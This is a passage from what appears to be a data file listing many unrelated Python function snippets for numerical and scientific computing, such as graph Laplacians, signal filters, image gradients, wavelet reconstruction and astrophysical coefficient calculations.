else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L", "def claret_linear(mu, coeff):\n return 1.0 - coeff * (1.0 - mu)", "def coefficients(self):\r\n return self.coef_['x']", "def laplacian(W, normalized=False):\r\n # Degree matrix.\r\n d = W.sum(axis=0)\r\n # Laplacian matrix.\r\n if not normalized:\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n L = D - W\r\n else:\r\n # d += np.spacing(np.array(0, W.dtype))\r\n d = 1 / np.sqrt(d)\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\r\n L = I - D * W * D\r\n\r\n # assert np.abs(L - L.T).mean() < 1e-9\r\n assert type(L) is scipy.sparse.csr.csr_matrix\r\n return L", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def filter_coefficients(position):\n return {\n 0: [0, 0, 0, 64, 0, 0, 0, 0],\n 1: [0, 1, -3, 63, 4, -2, 1, 0],\n 2: [-1, 2, -5, 62, 8, -3, 1, 0],\n 3: [-1, 3, -8, 60, 13, -4, 1, 0],\n 4: [-1, 4, -10, 58, 17, -5, 1, 0],\n 5: [-1, 4, -11, 52, 26, -8, 3, -1],\n 6: [-1, 3, -9, 47, 31, -10, 4, -1],\n 7: [-1, 4, -11, 45, 34, -10, 4, -1],\n 8: [-1, 4, -11, 40, 40, -11, 4, -1],\n 9: [-1, 4, -10, 34, 45, -11, 4, -1],\n 10: [-1, 4, -10, 31, 47, -9, 3, -1],\n 11: [-1, 3, -8, 26, 52, -11, 4, -1],\n 12: [0, 1, -5, 17, 58, -10, 4, -1],\n 13: [0, 1, -4, 13, 60, -8, 3, -1],\n 14: [0, 1, -3, 8, 62, -5, 2, -1],\n 15: [0, 1, -2, 4, 63, -3, 1, 0]\n }.get(position, 'Invalid fractional pixel position!')", "def laplacian_smoothing(texture_data, lap, lap_b, nb_iter, dt):\n mod = 1\n if nb_iter > 10:\n mod = 10\n if nb_iter > 100:\n mod = 100\n if nb_iter > 1000:\n mod = 1000\n # print(tex.shape[0])\n # print(tex.ndim)\n # if tex.ndim < 2:\n # Mtex = tex.reshape(tex.shape[0],1)\n # else:\n # Mtex = tex\n # using Implicit scheme\n # B(X^(n+1)-X^n)/dt+L(X^(n+1))=0\n M = lap_b + dt * lap\n for i in range(nb_iter):\n texture_data = lap_b * texture_data\n if texture_data.ndim > 1:\n for d in range(texture_data.shape[1]):\n texture_data[:, d], infos = lgmres(\n M.tocsr(), texture_data[:, d], tol=solver_tolerance\n )\n else:\n texture_data, infos = lgmres(M.tocsr(), texture_data, tol=solver_tolerance)\n if i % mod == 0:\n print(i)\n\n # using Explicit scheme, convergence guaranteed only for dt<1 and not\n # faster than implicit when using fem Laplacian\n # B(X^(n+1)-X^n)/dt+L(X^n)=0\n # M = B-dt*L\n # for i in range(Niter):\n # Mtex = M * Mtex\n # Mtex, infos = lgmres(B.tocsr(), Mtex, tol=solver_tolerance)\n # if (i % mod == 0):\n # print(i)\n print(\" OK\")\n return texture_data", "def compute_filter_ips_adjacent(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f1, f2, spec_corr, psd) for f1, f2 in zip(lal_filters[:-1], lal_filters[1:])])", "def bcL(self, rng=None):\n if rng is None:\n rng = random.PRNGKey(1)\n n = self.n\n x = onp.sin(self.bcmesh * np.pi)\n n_y = (np.floor((n + 1) / 2) - 1).astype(int)\n if rng is not None:\n coeffs = random.multivariate_normal(rng, np.zeros(16),\n np.diag(np.ones(16)))\n else:\n key = random.randint(random.PRNGKey(1), (1,), 1, 1000)\n coeffs = random.multivariate_normal(\n random.PRNGKey(key[0]), np.zeros(16), np.diag(np.ones(16)))\n left = coeffs[0] * x**3 + coeffs[1] * x**2 + coeffs[2] * x #+ coeffs[3]\n right = coeffs[4] * x**3 + coeffs[5] * x**2 + coeffs[6] * x #+ coeffs[7]\n lower = coeffs[8] * x**3 + coeffs[9] * x**2 + coeffs[10] * x #+ coeffs[11]\n upper = coeffs[12] * x**3 + coeffs[13] * x**2 + coeffs[14] * x #+ coeffs[15]\n shape = 2 * x.shape\n source = onp.zeros(shape)\n source[0, :] = upper\n source[n_y - 1, n_y - 1:] = lower[:n - n_y + 1]\n source[n_y - 1:, n_y - 1] = right[:n - n_y + 1]\n source[:, 0] = left\n source[-1, :n_y - 1] = right[n:n - n_y:-1]\n source[:n_y - 1, -1] = lower[n:n - n_y:-1]\n # because this makes the correct order of boundary conditions\n return source * (n + 1)**2", "def calculate_coefficients(self):\n for i in range(0, self.nz):\n zno = i * self.dz\n self.z[0][i] = zno\n plot_eccentricity_error = False\n position = -1\n for j in range(0, self.ntheta):\n # fmt: off\n self.gama[i][j] = j * self.dtheta + (np.pi - self.beta)\n [radius_external, self.xre[i][j], self.yre[i][j]] = \\\n self.external_radius_function(self.gama[i][j])\n [radius_internal, self.xri[i][j], self.yri[i][j]] = \\\n self.internal_radius_function(zno, self.gama[i][j])\n self.re[i][j] = radius_external\n self.ri[i][j] = radius_internal\n\n w = self.omega * self.ri[i][j]\n\n k = (self.re[i][j] ** 2 * (np.log(self.re[i][j]) - 1 / 2) - self.ri[i][j] ** 2 *\n (np.log(self.ri[i][j]) - 1 / 2)) / (self.ri[i][j] ** 2 - self.re[i][j] ** 2)\n\n self.c1[i][j] = (1 / (4 * self.viscosity)) * ((self.re[i][j] ** 2 * np.log(self.re[i][j]) -\n self.ri[i][j] ** 2 * np.log(self.ri[i][j]) +\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) *\n (k - 1)) - 2 * self.re[i][j] ** 2 * (\n (np.log(self.re[i][j]) + k - 1 / 2) * np.log(\n self.re[i][j] / self.ri[i][j])))\n\n self.c2[i][j] = (- self.ri[i][j] ** 2) / (8 * self.viscosity) * \\\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2 -\n (self.re[i][j] ** 4 - self.ri[i][j] ** 4) /\n (2 * self.ri[i][j] ** 2)) +\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2) /\n (self.ri[i][j] ** 2 *\n np.log(self.re[i][j] / self.ri[i][j]))) *\n (self.re[i][j] ** 2 * np.log(self.re[i][j] / self.ri[i][j]) -\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) / 2))\n\n self.c0w[i][j] = (- w * self.ri[i][j] *\n (np.log(self.re[i][j] / self.ri[i][j]) *\n (1 + (self.ri[i][j] ** 2) / (self.re[i][j] ** 2 - self.ri[i][j] ** 2)) - 1 / 2))\n # fmt: on\n if not plot_eccentricity_error:\n if abs(self.xri[i][j]) > abs(self.xre[i][j]) or abs(\n self.yri[i][j]\n ) > abs(self.yre[i][j]):\n plot_eccentricity_error = True\n position = i\n if plot_eccentricity_error:\n self.plot_eccentricity(position)\n sys.exit(\n \"Error: The given parameters create a rotor that is not inside the stator. \"\n \"Check the plotted figure and fix accordingly.\"\n )", "def convolution_as_maultiplication(I, F, print_ir=False):\n # number of columns and rows of the input \n I_row_num, I_col_num = I.shape \n\n # number of columns and rows of the filter\n F_row_num, F_col_num = F.shape\n\n # calculate the output dimensions\n output_row_num = I_row_num + F_row_num - 1\n output_col_num = I_col_num + F_col_num - 1\n if print_ir: print('output dimension:', output_row_num, output_col_num)\n\n # zero pad the filter\n F_zero_padded = np.pad(F, ((output_row_num - F_row_num, 0),\n (0, output_col_num - F_col_num)),\n 'constant', constant_values=0)\n if print_ir: print('F_zero_padded: ', F_zero_padded)\n\n # use each row of the zero-padded F to creat a toeplitz matrix. \n # Number of columns in this matrices are same as numbe of columns of input signal\n toeplitz_list = []\n for i in range(F_zero_padded.shape[0]-1, -1, -1): # iterate from last row to the first row\n c = F_zero_padded[i, :] # i th row of the F \n r = np.r_[c[0], np.zeros(I_col_num-1)] # first row for the toeplitz fuction should be defined otherwise\n # the result is wrong\n toeplitz_m = toeplitz(c,r) # this function is in scipy.linalg library\n toeplitz_list.append(toeplitz_m)\n if print_ir: print('F '+ str(i)+'\\n', toeplitz_m)\n\n # doubly blocked toeplitz indices: \n # this matrix defines which toeplitz matrix from toeplitz_list goes to which part of the doubly blocked\n c = range(1, F_zero_padded.shape[0]+1)\n r = np.r_[c[0], np.zeros(I_row_num-1, dtype=int)]\n doubly_indices = toeplitz(c, r)\n if print_ir: print('doubly indices \\n', doubly_indices)\n\n ## creat doubly blocked matrix with zero values\n toeplitz_shape = toeplitz_list[0].shape # shape of one toeplitz matrix\n h = toeplitz_shape[0]*doubly_indices.shape[0]\n w = toeplitz_shape[1]*doubly_indices.shape[1]\n doubly_blocked_shape = [h, w]\n doubly_blocked = np.zeros(doubly_blocked_shape)\n\n # tile toeplitz matrices for each row in the doubly blocked matrix\n b_h, b_w = toeplitz_shape # hight and withs of each block\n for i in range(doubly_indices.shape[0]):\n for j in range(doubly_indices.shape[1]):\n start_i = i * b_h\n start_j = j * b_w\n end_i = start_i + b_h\n end_j = start_j + b_w\n doubly_blocked[start_i: end_i, start_j:end_j] = toeplitz_list[doubly_indices[i,j]-1]\n\n if print_ir: print('doubly_blocked: ', doubly_blocked)\n\n # convert I to a vector\n vectorized_I = matrix_to_vector(I)\n if print_ir: print('vectorized_I: ', vectorized_I)\n \n # get result of the convolution by matrix mupltiplication\n result_vector = np.matmul(doubly_blocked, vectorized_I)\n if print_ir: print('result_vector: ', result_vector)\n\n # reshape the raw rsult to desired matrix form\n out_shape = [output_row_num, output_col_num]\n output = vector_to_matrix(result_vector, out_shape)\n if print_ir: print('Result of implemented method: \\n', output)\n \n return output", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def nonlinear(x):\n xo = np.int32(x)\n y = [xo[n] ** 2 + xo[n - 1] * xo[n + 1] for n in range(1, len(x) - 1)]\n window = np.bartlett(12)\n return np.convolve(y, window)", "def dLdp(C1s,C0s,ks,bs,sigma=1):\n # return np.array(jit(jacfwd(L,argnums=1))(q,ps,C1s,C0s,ks,bs,sigma))\n \n # A = FIM(q,ps,C1s,C0s,ks,bs,sigma)\n \n # Construct A(q,ps)\n A = FIM(C1s,C0s,ks,bs,sigma)\n\n # Construct dAdp(q,ps)\n dAdp = jit(jacfwd(A,argnums=1))\n \n # Construct inv_A(q,ps)\n inv_A=lambda q,ps: jnp.linalg.inv(A(q,ps))\n \n # print(np.trace(-dAinv(inv_A,dAdp),axis1=0,axis2=1)-np.array(jit(jacfwd(L,argnums=1))(q,ps,C1s,C0s,ks,bs,sigma)))\n \n # Construct dLdP(q,ps)\n\n\n\n return lambda q,ps: -np.array(jnp.trace(dAinv(inv_A(q,ps),dAdp(q,ps)),axis1=0,axis2=1))", "def Laplace_covariance(self):\n #TODO add in the prior contributions for MAP estimation\n #TODO fix the hessian for tied, constrained and fixed components\n if hasattr(self, 'log_likelihood_hessian'):\n A = -self.log_likelihood_hessian()\n\n else:\n print \"numerically calculating hessian. please be patient!\"\n x = self._get_params()\n def f(x):\n self._set_params(x)\n return self.log_likelihood()\n h = ndt.Hessian(f)\n A = -h(x)\n self._set_params(x)\n # check for almost zero components on the diagonal which screw up the cholesky\n aa = np.nonzero((np.diag(A)<1e-6) & (np.diag(A)>0.))[0]\n A[aa,aa] = 0.\n return A", "def lowpass(R1=10e3,R2=10e3,C1=1e-9,C2=1e-9,G=1.586,Vi=1):\n A=Matrix([[0,0,1,-1/G],\n [-1/(1+s*R2*C2),1,0,0],\n [0,-G,G,1],\n [-1/R1-1/R2-s*C1,1/R2,0,s*C1]])\n \n b=Matrix([0,0,0,-Vi/R1])\n \n V=A.inv()*b\n return (A,b,V)", "def get_edges(image):\n if len(image.shape) == 3:\n # has more than one channel\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n kernel = np.ones((5, 5), np.float32)/5\n dst = cv2.filter2D(image, -1, kernel)\n lap = cv2.Laplacian(dst, cv2.CV_64F)\n return lap", "def getldcoeffs(Teff, logg, z, Tefferr, loggerr, zerr, law, channel, quiet = False):\n\n if not quiet: print \"\\nInterpolating {} limb darkening coefficients for {}...\".format(law,channel)\n # Paths where the tables are stored\n ch1path = \"{}/PhD/code/LD3.6Spitzer.txt\".format(os.getenv('HOME'))\n ch2path = \"{}/PhD/code/LD4.5Spitzer.txt\".format(os.getenv('HOME'))\n\n # Read in the required table\n if channel == 'ch1':\n table = np.genfromtxt(ch1path, skip_header=13, dtype=float, encoding = None)\n elif channel == 'ch2':\n table = np.genfromtxt(ch2path, skip_header=13, dtype=float, encoding = None)\n\n # 3D array of discrete values of teff, logg and z\n points = np.array([table.T[0], table.T[1], table.T[2]]).T\n\n if law == \"linear\": index = [0]\n elif law == \"quadratic\": index = [1,2]\n elif law == \"nonlinear\": index = [6,7,8,9]\n else: pass\n\n coeffs = np.zeros(len(index))\n coeffs_err = np.zeros(len(index))\n\n for i in range(len(index)):\n # All possible values of desired limb darkening coefficient (indexed)\n values = table.T[3+index[i]]\n # 3D Interpolates\n interp = LinearNDInterpolator(points,values)\n coeffs[i] = interp.__call__([Teff,logg,z])\n\n # Estimate the error on the interpolated result based on errors Teff,logg,z\n coeffsTU = interp.__call__(np.array([Teff+Tefferr,logg,z]))\n coeffsTL = interp.__call__(np.array([Teff-Tefferr,logg,z]))\n coeffsgU = interp.__call__(np.array([Teff,logg+loggerr,z]))\n coeffsgL = interp.__call__(np.array([Teff,logg-loggerr,z]))\n coeffszU = interp.__call__(np.array([Teff,logg,z+zerr]))\n coeffszL = interp.__call__(np.array([Teff,logg,z-zerr]))\n\n coeffs_err[i] = np.sqrt( ((coeffsTU - coeffsTL)/2.)**2 + ((coeffsgU - coeffsgL)/2.)**2 + ((coeffszU - coeffszL)/2.)**2 )\n\n if not quiet: print \"\\t Coeff(s): {}\".format(coeffs)\n if not quiet: print \"\\t Coeff Err(s): {}\".format(coeffs_err)\n\n return coeffs.tolist(), coeffs_err.tolist()", "def Z_lopass(C, L, R_L, f):\n return 1/(1/Xcap(C,f) + 1/Z_low(L, R_L, f))", "def coeff_b(nrows, ncols) -> np.ndarray:\n coeff_array = np.zeros((nrows, ncols), dtype=\"complex_\")\n for idx, _ in np.ndenumerate(coeff_array):\n coeff_array[idx] = 1j * (idx[0] - idx[1])\n return coeff_array", "def convex_conj(self):\n return KullbackLeiblerCrossEntropy(self.domain, self.prior)", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def poly_from_zeros(z):\n if len(z) == 0:\n return [1]\n p = [1, -z[0]]\n for k in range(1, len(z)):\n p = _convolve(p, [1, -z[k]])\n return p", "def Laplace_covariance(self):\r\n # TODO add in the prior contributions for MAP estimation\r\n # TODO fix the hessian for tied, constrained and fixed components\r\n if hasattr(self, 'log_likelihood_hessian'):\r\n A = -self.log_likelihood_hessian()\r\n\r\n else:\r\n print \"numerically calculating Hessian. please be patient!\"\r\n x = self._get_params()\r\n def f(x):\r\n self._set_params(x)\r\n return self.log_likelihood()\r\n h = ndt.Hessian(f) # @UndefinedVariable\r\n A = -h(x)\r\n self._set_params(x)\r\n # check for almost zero components on the diagonal which screw up the cholesky\r\n aa = np.nonzero((np.diag(A) < 1e-6) & (np.diag(A) > 0.))[0]\r\n A[aa, aa] = 0.\r\n return A", "def lapsharp(image, maskret = False):\n #padded_image = np.pad(img, (1, 1), mode = 'symmetric')\n # lap is linear therefore;\n # lap f(x,y) = f(x + 1, y) + f(x - 1, y) + f(x, y + 1) + f(x, y - 1) - 4f(x,y)...\n #--------------------\n c = -1 # Depends on kernel\n # make zero kernal\n lapmask = np.zeros((3, 3))\n \n # add values to kernel\n lapmask[0,0] = 1\n lapmask[0,1] = 1\n lapmask[0,2] = 1\n\n lapmask[1,0] = 1\n lapmask[1,1] = -8\n lapmask[1,2] = 1\n\n lapmask[2,0] = 1\n lapmask[2,1] = 1\n lapmask[2,2] = 1\n #--------------------\n mask = convolve2d(image, lapmask, mode = 'same')\n result = image + c*mask\n\n # Map values to 0-255\n g1 = image - np.min(image)\n g = g1/np.max(g1) *255\n g = g.astype('uint8')\n\n if maskret == True:\n return g, mask\n else:\n return g.astype('uint8')", "def fLinear(Vc1,Vc2,Vc3,Vk,Vw,Va,Vf,Pc1,Pc2,Pc3,Pk,Pw,Pa,Pf):\n#\n# 1. Normalise volumetric components:\n#\t-----------------------------------\n\tSum=abs(Vc1)+abs(Vc2)+abs(Vc3)+abs(Vk)+abs(Vw)+abs(Va)+abs(Vf)\n\tVc1=abs(Vc1)/Sum\n\tVc2=abs(Vc2)/Sum\n\tVc3=abs(Vc3)/Sum\n\tVk=abs(Vk)/Sum\n\tVw=abs(Vw)/Sum\n\tVa=abs(Va)/Sum\n\tVf=abs(Vf)/Sum\n#\n#\t2. Compute liear response function:\n#\t-----------------------------------\n\tLrf=Vc1*Pc1+Vc2*Pc2+Vc3*Pc3+Vk*Pk+Vw*Pw+Va*Pa+Vf*Pf\n#\n# 3. Output result:\n#\t-----------------\n\treturn Lrf", "def LP_filt(filterLength, x):\n b=np.ones(filterLength,)/(filterLength) #Finite Impulse Response (FIR) Moving Average (MA) filter with one second filter length\n a=1\n y = signal.filtfilt(b, a, x)\n return y", "def L1(X):\n \n sanitycheck(X,np.ndarray)\n return np.sqrt(np.power(X, 2)).sum(axis=1)", "def lap_mat(self):", "def cov_l2cov_lmin(C_l) -> np.array:\n def isDiag(M):\n i, j = M.shape\n assert i == j \n test = M.reshape(-1)[:-1].reshape(i-1, j+1)\n return ~np.any(test[:, 1:])\n\n def invdiagmat(C):\n import copy\n ret = copy.deepcopy(C)\n row, col = np.diag_indices(ret.shape[0])\n ret[row, col] = 1/np.diag(ret)\n return ret\n\n elaw = np.ones(C_l.shape[-1])\n if isDiag(C_l):\n inv = invdiagmat(C_l)\n else:\n inv = np.linalg.inv(C_l)\n\n cov_minimal = elaw @ inv @ elaw\n return 1/cov_minimal", "def XtoL(self, x):\n lc = np.zeros(3)\n \n lc[0] = (x[0]-self.x0[0])/self.dh[0];\n lc[1] = (x[1]-self.x0[1])/self.dh[1];\n lc[2] = (x[2]-self.x0[2])/self.dh[2];\n \n return lc", "def filt_lp(sig: np.ndarray, Ss: int, Cfs: int, Cfs1: None,\n order=5) -> np.ndarray:\n nyq = 0.5 * Ss\n normal_cutoff = Cfs / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return lfilter(b, a, sig)", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def poly2lsf(a):\n\n #Line spectral frequencies are not defined for complex polynomials.\n\n # Normalize the polynomial\n\n a = np.array(a)\n if a[0] != 1:\n a/=a[0]\n\n if max(np.abs(np.roots(a))) >= 1.0:\n error('The polynomial must have all roots inside of the unit circle.');\n\n\n # Form the sum and differnce filters\n\n p = len(a)-1 # The leading one in the polynomial is not used\n a1 = np.concatenate((a, np.array([0])))\n a2 = a1[-1::-1]\n P1 = a1 - a2 # Difference filter\n Q1 = a1 + a2 # Sum Filter\n\n # If order is even, remove the known root at z = 1 for P1 and z = -1 for Q1\n # If odd, remove both the roots from P1\n\n if p%2: # Odd order\n P, r = deconvolve(P1,[1, 0 ,-1])\n Q = Q1\n else: # Even order\n P, r = deconvolve(P1, [1, -1])\n Q, r = deconvolve(Q1, [1, 1])\n\n rP = np.roots(P)\n rQ = np.roots(Q)\n\n aP = np.angle(rP[1::2])\n aQ = np.angle(rQ[1::2])\n\n lsf = sorted(np.concatenate((-aP,-aQ)))\n\n return lsf", "def waverec2(coeffs: list, wavelet: pywt.Wavelet) -> torch.Tensor:\n _, _, rec_lo, rec_hi = get_filter_tensors(\n wavelet, flip=False, device=coeffs[0].device,\n dtype=coeffs[0].dtype\n )\n filt_len = rec_lo.shape[-1]\n rec_filt = construct_2d_filt(lo=rec_lo, hi=rec_hi)\n\n res_ll = coeffs[0]\n for c_pos, res_lh_hl_hh in enumerate(coeffs[1:]):\n res_ll = torch.cat(\n [res_ll, res_lh_hl_hh[0], res_lh_hl_hh[1], res_lh_hl_hh[2]], 1\n )\n res_ll = torch.nn.functional.conv_transpose2d(\n res_ll, rec_filt, stride=2)\n\n # remove the padding\n padl = (2 * filt_len - 3) // 2\n padr = (2 * filt_len - 3) // 2\n padt = (2 * filt_len - 3) // 2\n padb = (2 * filt_len - 3) // 2\n if c_pos < len(coeffs) - 2:\n # if 1:\n pred_len = res_ll.shape[-1] - (padl + padr)\n next_len = coeffs[c_pos + 2][0].shape[-1]\n pred_len2 = res_ll.shape[-2] - (padt + padb)\n next_len2 = coeffs[c_pos + 2][0].shape[-2]\n if next_len != pred_len:\n padr += 1\n pred_len = res_ll.shape[-1] - (padl + padr)\n assert (\n next_len == pred_len\n ), \"padding error, please open an issue on github \"\n if next_len2 != pred_len2:\n padb += 1\n pred_len2 = res_ll.shape[-2] - (padt + padb)\n assert (\n next_len2 == pred_len2\n ), \"padding error, please open an issue on github \"\n if padt > 0:\n res_ll = res_ll[..., padt:, :]\n if padb > 0:\n res_ll = res_ll[..., :-padb, :]\n if padl > 0:\n res_ll = res_ll[..., padl:]\n if padr > 0:\n res_ll = res_ll[..., :-padr]\n return res_ll", "def coefficients(self) :\n return self.__coefficients", "def imageGradient( iImage ):\n iImage = np.array( iImage, dtype='float' ) \n iSobel = np.array( ((0,0,0),(-1,0,1),(0,0,0)) ) #ni dejansko Sobel, je samo centralna diferenca.\n oGx = ni.convolve( iImage, iSobel, mode='constant' )\n oGy = ni.convolve( iImage, np.transpose( iSobel ), mode='constant' )\n return oGx, oGy", "def langevin_coefficients(\n temperature,\n dt,\n friction,\n masses):\n vscale = np.exp(-dt*friction)\n if friction == 0:\n fscale = dt\n else:\n fscale = (1-vscale)/friction\n kT = BOLTZ * temperature\n nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n ca = vscale\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def derive_cardelli(wavelength, Rv):\n x = 1.0 / np.array(wavelength)\n\n # check for applicability\n if (np.min(x) < 0.3):\n print( 'wavelength is longer than applicable range for Cardelli law')\n return None\n\n if (np.max(x) > 8.0):\n print( 'wavelength is shorter than applicable range for Cardelli law')\n return None\n \n # Set up some arrays for coefficients that we will need\n a = np.zeros(len(x), dtype=float)\n b = np.zeros(len(x), dtype=float)\n\n y = x - 1.82\n\n # Calculate coefficients for long wavelengths (low wavenumber)\n # Wavenumger <= 1.1 (Eq. 2a, 2b)\n idx = np.where(x <= 1.1)[0]\n a[idx] = 0.574 * x[idx] ** 1.61\n b[idx] = -0.527 * x[idx] ** 1.61\n\n # Calculate coefficients for intermediate wavelengths\n # 1.1 < wavenumber <= 3.3 (Eq. 3a, 3b)\n idx = np.where((x > 1.1) & (x <= 3.3))[0]\n yy = y[idx]\n a[idx] = 1 + (0.17699 * yy) - (0.50447 * yy ** 2) - \\\n (0.02427 * yy ** 3) + (0.72085 * yy ** 4) + \\\n (0.01979 * yy ** 5) - (0.77530 * yy ** 6) + \\\n (0.32999 * yy ** 7)\n b[idx] = (1.41338 * yy) + (2.28305 * yy ** 2) + \\\n (1.07233 * yy ** 3) - (5.38434 * yy ** 4) - \\\n (0.62251 * yy ** 5) + (5.30260 * yy ** 6) - \\\n (2.09002 * yy ** 7)\n\n # Calculate the long wavelength\n # 3.3 < wavenumber < 5.9 (Eq. 4a, 4b)\n idx = np.where((x > 3.3) & (x < 5.9))[0]\n xx = x[idx]\n a[idx] = 1.752 - (0.316 * xx) - (0.104/((xx - 4.67) ** 2 + 0.341))\n b[idx] = -3.090 + (1.825 * xx) + (1.206/((xx - 4.62) ** 2 + 0.263))\n\n # Calculate the longest wavelength\n # 5.9 <= wavenumber (Eq. 4a, 4b)\n idx = np.where(x >= 5.9)[0]\n xx = x[idx]\n a[idx] = 1.752 - (0.316 * xx) - (0.104/((xx - 4.67) ** 2 + 0.341)) + \\\n (-0.04473 * (xx - 5.9) ** 2) - (0.009779 * (xx - 5.9) ** 3)\n b[idx] = -3.090 + (1.825 * xx) + (1.206/((xx - 4.62) ** 2 + 0.263)) + \\\n (0.2130 * (xx - 5.9) ** 2) + (0.1207 * (xx - 5.9) ** 3)\n\n # A(lam) / A(V), from Eq. 1\n extinction = a + b/Rv\n\n # Now, want to produce A_lambda / AKs, to match other laws\n k_ind = np.where(abs(x-0.46) == min(abs(x-0.46)))\n Aks_Av = a[k_ind] + b[k_ind]/Rv # Aks / Av\n Av_Aks = 1.0 / Aks_Av # Av / Aks\n \n output = extinction * Av_Aks # (A(lamb) / Av) * (Av / Aks) = (A(lamb) / Aks)\n\n return output", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def L2_func(x):\n return K.expand_dims(K.sqrt(K.sum(K.pow(x,2), axis=1)))", "def coefficients_to_slip(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n slip = partials @ y\n return slip", "def index2lpol(coeffs, index):\n n = max(index)\n ar = np.zeros(n + 1)\n ar[index] = coeffs\n return ar", "def beta_gen_lasso(p):\n cardi = 0.005\n return np.array([0]*int(p-int(cardi*p)) + [1]*int(cardi*p))", "def _l1m_objective(a,X,*args):\n \n return(np.sum(np.apply_along_axis(_euclidnorm,1,_diffmat_objective(a,X))))", "def imageGradient( iImage ):\n iImage = np.array( iImage, dtype='float' ) \n iSobel = np.array( ((-1,0,1),(-2,0,2),(-1,0,1)) ) \n oGx = ni.convolve( iImage, iSobel, mode='nearest' )\n oGy = ni.convolve( iImage, np.transpose( iSobel ), mode='nearest' )\n return oGx, oGy", "def get_proj_coeffs(self, src):\n self.proj_coeffs = parallel.call_and_bcast(self.get_array, src)", "def test_lfilter_simple(self):\n\n waveform = torch.rand(2, 44100 * 1, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n\n self.assertEqual(output_waveform[:, 3:], waveform[:, 0:-3], atol=1e-5, rtol=1e-5)", "def trend_filter(rets_data, lambda_value):\r\n #USING CVXPY convex optimiser\r\n n_periods = rets_data.shape[0]\r\n rets = rets_data.to_numpy()\r\n\r\n D_full = np.diag([1]*n_periods) - np.diag([1]*(n_periods-1), 1)\r\n D = D_full[0:n_periods-1,]\r\n beta = 